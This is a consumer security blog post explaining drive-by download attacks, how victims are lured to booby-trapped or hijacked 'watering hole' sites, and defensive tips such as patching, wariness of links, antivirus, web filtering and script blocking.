Defending against drive-by downloads

In case you haven’t heard the term before, a drive-by download (DbD) is a class of cyber attack where you visit a booby-trapped web site and it automatically, and silently, downloads and executes malicious code on your computer.

By default, web sites can’t just download and run code on your computer, so a successful DbD attack relies on some sort of programmatic flaw or vulnerability in the software you use to surf the web. For instance, browsers like Internet Explorer, Firefox, Safari, and Chrome make the most obvious targets.

However, nowadays most users install many other web-related products, which attackers can exploit in DbD attacks. For instance, products like Java, Flash, Shockwave, Reader, QuickTime, and many others insert plugins into your web browser, which allows them to render the dynamic content you encounter when visiting modern web sites. The problem is these plugins also give attackers access to this software as well—providing more attack surface opportunities.

In short, if an attacker can find any vulnerability in the diverse software-set you use to browse the web, and he can entice you to a web site containing a bit of malicious code, he can exploit these flaws to force your computer to infect itself with malware without you even knowing it. By luring you to a special place and distracting you, these network criminals can quietly compromise you behind your back.

How do hackers get me to malicious sites?
“But wait a second,” you might exclaim, “I’m not naive enough to visit suspicious web sites on the Internet. They can’t infect me if they can’t get me there, right?”

Of course, you are correct. Unless an attacker can get you to his booby-trapped web site, his DbD attack will not succeed. However, you might be surprised at how easy it is to lure victims to booby-trapped sites today.

Lets start with the old, tried-and-true techniques. In the past, you might have heard security professionals warn you against visiting the seedier side of the Internet. Just like in the red-light districts found in the real world, lots of questionably legal activities happen in some of sleazier parts of the Internet. Sites catering to pornography, software piracy, drugs sales, and more, often partner with cyber criminals (knowingly or unknowingly), and serve up malware to their visitors via DbD attacks. Anytime you see something shady offered for free on the Internet, chances are you’ll pay in ways you don’t quite know.

Another way to get victims to malicious sites is just to invite them to visit. Cyber criminals use every Internet messaging mechanism they can to spam out links to their malicious pages. They send emails, instant messages (IMs), or post to social networks, sharing links that go direct to booby-trapped websites. Of course, they dress up their message in some way to get you interested, citing the latest pop culture event, or pretending to be your friend sharing a fun link. They also often use link-shortening services to make their malicious links seem more benign. Since many users still don’t realize web links can be dangerous, many fall for the bait and click the link for an unwelcome surprise.

However, the most nefarious way to draw victims to booby-trapped DbD web sites is the watering hole attack. All the methods described previously depend on getting someone to a site that they may not visit on their own accord-¦ but what if you could hijack a site they frequented regularly? Just like the lions stalking prey in the Savannah, hackers know that if they can poison your favorite “watering hole” web site, you’ll surely stumble upon their DbD code.

The attackers search for web application vulnerabilities in popular and legitimate web sites, such as SQL injection (SQLi) and cross-site scripting (XSS) flaws, then exploit these problems to inject malicious code into the legitimate site, redirecting anyone who visits the site to malicious DbD code.

In the past, I could warn you against visiting sordid web sites to avoid DbD attacks. However, today any site on the Internet—even the ones you trust the most—may have been hijacked and could be hiding a drive-by download.

Part of being a good spy is understanding your adversary’s techniques, and then learning the tradecraft that can protect you in the field. Now that you know what a drive-by download is, and how they work, here’s a few cyber tradecraft tips that will protect you online:

Patch, patch, and then patch some more – In “computer-ese,” patching means to apply the latest updates to your computer software. As mentioned, web sites can’t forcefully download software to your computer unless they can take advantages of programming flaws in the software you run. Many of the DbD attacks seen in the wild exploit flaws that vendors have already fixed. If you keep your software up to date, most of attacks will fail. Obviously patch you web browser, but also know hackers are focusing on exploiting Java and Flash vulnerabilities lately. You should patch these packages just as aggressively as the browser itself. In fact, I would recommend disabling Java if you can.

Don’t click unsolicited links – Simply put, avoid clicking unsolicited links sent to you via email and IM. I probably can’t convince you not to click on links from your friends (or ones that seem like they come from your friends), but at least remain wary of them, and look at the URL for the link before clicking it. I would also be careful around shortened links, and leverage tools to expand and preview these links before following them. Here’s a quick tip; if you add a “+” character to the end of a bit.ly link, you will see a preview of the actual URL before visiting it.

Use antivirus (AV) and intrusion prevention (IPS) – While vigilance and good practices can help you avoid many attacks, no one is perfect. There will be a day that even the best of us stumble on DbD attack sites. IPS systems can frequently detect the network exploits these attacks leverage, and AV systems can often recognize the malicious payloads they try to silently download. Use AV and IPS systems, and keep them up to date.

Use reputation-based web-filtering solutions – The malicious sites that serve DbD attacks change quite frequently, as do the legitimate sites that have been hijacked. Security organizations and vendors, like WatchGuard, use many automated techniques to keep track of the latest malware distributing sites, and offer reputation services that can keep you and your users away from them. You should consider using web-filtering solutions to help you avoid dangerous sites on the Internet.

Pro-tip: Limit web-based scripting with NoScript (and others) – Without going into all the technical details, know that many DbD attacks rely on web scripting languages, such as JavaScript and ActiveX, to carry out their attacks. Disabling these scripting technologies would block a huge majority of DbD attacks. Unfortunately, it’s not quite that simple. Many legitimate web sites also use these scripting languages for perfectly normal aspects of their web site. That’s why I recommend script whitelisting technologies like Firefox’s NoScript or Chrome’s NotScripts or Click-to-Play. These plugins will prevent scripts and some dynamic web content from running by default, but also allow you to easily whitelist sites you trust.

Black hats have become extremely sneaky and sophisticated in their cyber attacks. Drive-by downloads have become the silent but deadly, de facto attack that criminals have chosen to deliver most of their malware, and watering hole attacks make providing victims child’s play. However, with a little vigilance and knowledge, anyone can avoid this web-based infection vector. Diligently apply the cyber tradecraft you learned and you’ll survive most DbD malware encounters unscathed.